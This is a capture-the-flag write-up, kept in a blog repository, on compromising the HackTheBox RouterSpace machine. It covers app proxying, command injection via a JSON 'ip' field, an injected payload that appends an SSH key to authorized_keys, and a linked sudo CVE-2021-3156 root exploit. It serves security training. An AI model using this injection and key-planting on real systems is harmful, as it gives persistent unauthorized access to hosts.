d3vyce/blog
1
0
Fork 0
Code Issues 1 Pull Requests Actions Packages Projects Releases Wiki Activity
blog/content/writeup-ctf/writeup-routerspace-htb/index.md
d3vyce 095a13b2c9
Some checks failed
Build Blog Docker Image / build docker (push) Failing after 1m11s
Details
add: writeup-ctf
2024-03-02 21:49:07 +01:00

135 lines
4.3 KiB
Markdown
Raw Blame History

---
title: "Writeup - RouterSpace (HTB)"
date: 2022-04-05
slug: "writeup-routerspace-htb"
type: "writeup-ctf"
---
This is a writeup for the [RouterSpace](https://app.hackthebox.com/machines/RouterSpace) machine from the HackTheBox site.
## Enumeration
First, let's start with a scan of our target with the following command:
```bash
nmap -sV 10.129.175.15
```
Two TCP ports are discovered:
![](img/image-1.webp)
- 22/tcp : SSH port
- 80/tcp : HTTP web server
Let's go to the site and see if we can find some information.
![](img/image-2.webp)
The site presents us with an application to connect our router to "routerspace". In addition to this information we have the possibility to download the application in .apk format.
## Exploit
I first tried to analyze the application with [APKtool](https://www.kali.org/tools/apktool/). But I didn't find anything special. So I will try to install it with the help of an emulator.
After testing several emulation solutions, I finally chose Anbox. To install it on kali I followed the following guide:
[How to install Anbox on Debian](https://dev.to/sbellone/how-to-install-anbox-on-debian-1hjd)
After starting Anbox, I start Burp in listening mode on all interfaces, then I set adb with the burp proxy with the following command:
```bash
adb shell settings put global http_proxy 192.168.250.1:8080
```
I then install the application with the following command:
```bash
adb install RouterSpace.apk
```
After starting the application and testing the connection, I notice that burp is intercepting packets to "<http://routerspace.htb>". So I add this domain to the "/etc/hosts" file.
![](img/image-3.webp)
While analyzing the packet sent by the application I notice a json IP field.
![](img/image-4.webp)
By adding ";" I can insert a command that the remote host interprets as a command. Perfect!
After some tests I realize that I can't launch a reverse shell, possibly there are firewall rules that block. To be confirmed...
Another solution is to use SSH to get access. I check if there is a '.ssh' folder for the user paul :
![](img/image-5.webp)
It exists, so I generate keys:
```bash
┌──(kali㉿kali)-[~]
└─$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:UbAb/Eaflsqf/Wneee+yy26b+ZymMNXYfXH7oxac8/E kali@kali
The key's randomart image is:
+---[RSA 3072]----+
| ... |
| . o |
| = . ..|
| * . o+ =|
| S o *o.+o|
| o o.= .o|
| oo +.+|
| .o=+BE|
| +=#&X|
+----[SHA256]-----+
```
Then I add my public key in the "authorized\_jeys" file with the following command:
```bash
"ip":";echo 'ssh-rsa [public_key] kali@kali'>> ~/.ssh/authorized_keys"
```
I can now connect in SSH and get the first flag.
![](img/image-6.webp)
## Privilege escalation
To start I'll use [linPeas](https://linpeas.sh/) to do a first exploit tracking on the machine. But I have indeed the impression that IPtables rules are blocking my requests:
![](img/image-7.webp)
To transfer my file I will use "scp" with the following command:
```bash
┌──(kali㉿kali)-[~]
└─$ scp linpeas.sh paul@10.10.11.148:~/
linpeas.sh 100% 748KB 8.4MB/s 00:00
```
After running the script, I notice that the machine uses a version of sudo that is exploitable (CVE-2021-3156). After some research I find this script which allows to create a root shell:
[GitHub - mohinparamasivam/Sudo-1.8.31-Root-Exploit: Root shell PoC for CVE-2021-3156Root shell PoC for CVE-2021-3156. Contribute to mohinparamasivam/Sudo-1.8.31-Root-Exploit development by creating an account on GitHub.![](https://github.com/fluidicon.png)
{{< github repo="mohinparamasivam/Sudo-1.8.31-Root-Exploit" >}}
And indeed after executing the code, I get a root shell and I can recover the last flag!
![](img/image-8.webp)
## Recommendations
To patch this host I think it would be necessary to perform a number of actions:
- Secure the application to avoid code injection
- Run the service with a user who does not have SSH access
- Update the sudo version to a more secure one
Reference in New Issue View Git Blame Copy Permalink